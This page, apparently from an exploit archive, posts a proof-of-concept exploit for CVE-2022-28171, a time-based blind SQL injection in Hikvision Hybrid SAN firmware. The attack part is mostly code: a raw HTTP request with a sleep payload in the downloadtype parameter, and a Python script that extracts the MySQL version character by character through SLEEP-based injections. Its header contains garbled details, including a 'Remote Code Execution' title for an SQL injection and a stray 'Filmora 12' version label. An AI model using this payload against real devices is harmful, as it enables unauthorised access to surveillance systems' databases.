exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hikvision Hybrid SAN Ds-a71024 SQL Injection

Hikvision Hybrid SAN Ds-a71024 SQL Injection
Posted Jul 20, 2023
Authored by Thurein Soe

Hikvision Hybrid SAN Ds-a71024 firmware suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2022-28171
SHA-256 | 9004daadddb908c449ed0c8cd1fe390b2183ffaa2fea3b3933f83d62aba1e09c

Hikvision Hybrid SAN Ds-a71024 SQL Injection

Change Mirror Download
# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution
# Date: 16 July 2023
# Exploit Author: Thurein Soe
# CVE : CVE-2022-28171
# Vendor Homepage: https://www.hikvision.com
# Software Link: N/A
# Refence Link: https://cve.report/CVE-2022-28171
# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s
'''
Vendor Description:

Hikvision is a world-leading surveillance manufacturer and supplier of
video surveillance and Internet of Things (IoT) equipment for civilian and
military purposes.
Some Hikvision Hybrid SAN products were vulnerable to multiple remote code
execution vulnerabilities such as command injection, Blind SQL injection,
HTTP request smuggling, and reflected cross-site scripting.
This resulted in remote code execution that allows an adversary to execute
arbitrary operating system commands and more. However, an adversary must be
on the same network to leverage this vulnerability to execute arbitrary
commands.

Vulnerability description:
A manual test confirmed that The download type parameter was vulnerable to
Blind SQL injection.I created a Python script to automate and enumerate SQL
versions as the Application was behind the firewall and block all the
requests from SQLmap.

Request Body:
GET
/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'
HTTP/1.1
Host: X.X.X.X.12:2004
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Connection: close

POC:
'''
import requests
import time

url = "http://X.X.X.X:2004/web/log/dynamic_log.php"

# Function to check if the response time is greater than the specified delay
def is_response_time_delayed(response_time, delay):
return response_time >= delay

# Function to perform blind SQL injection and check the response time
def perform_blind_sql_injection(payload):
proxies = {
'http': 'http://localhost:8080',
'https': 'http://localhost:8080',
}

params = {
'target': 'makeMaintainLog',
'downloadtype': payload
}
headers = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
'Accept-Language': 'en',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',
'Connection': 'close'
}

start_time = time.time()
response = requests.get(url, headers=headers, params=params,
proxies=proxies)
end_time = time.time()

response_time = end_time - start_time
return is_response_time_delayed(response_time, 20)

# Enumerate the MySQL version
def enumerate_mysql_version():
version_Name = ''
sleep_time = 10 # Sleep time is 10 seconds

payloads = [
f"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},
SLEEP({sleep_time}), 0))-- -"
for i in range(1, 11)
for mid in range(256)
]

for payload in payloads:
if perform_blind_sql_injection(payload):
mid = payload.split("=")[-1].split(",")[0]
version_Name += chr(int(mid))

return version_Name

# Enumeration is completed
version_Name = enumerate_mysql_version()
print("MySQL version is:", version_Name)



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close